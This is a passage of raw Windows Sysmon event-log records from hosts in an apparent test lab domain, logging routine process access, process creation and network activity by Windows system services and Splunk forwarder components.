Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000001054322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.034{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CDD-6151-7000-00000000FD01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CDD-6151-7000-00000000FD01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.019{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CDD-6151-7000-00000000FD01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.842{5EBD8912-8CDD-6151-7000-00000000FD01}3484C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980631Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:30.931{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03DC683511C0DE1DBF6B4BCAF7937E5B,SHA256=131B6B1ABC1E79AB8F603A555F4ACD7683E3E2F954C61E799FB9ED26D59191F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980630Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.897{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59499-false10.0.1.12-8000- 354300x80000000000000001054369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.632{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-49563- 354300x80000000000000001054368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.586{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49704-false10.0.1.12-8000- 354300x80000000000000001054367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.429{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-54786- 354300x80000000000000001054366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:30.010{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49703-false10.0.1.12-8000- 354300x80000000000000001054365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.633{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49563- 10341000x80000000000000001054364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CDF-6151-7200-00000000FD01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:31.800{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CDF-6151-7200-00000000FD01}3988C:\Program 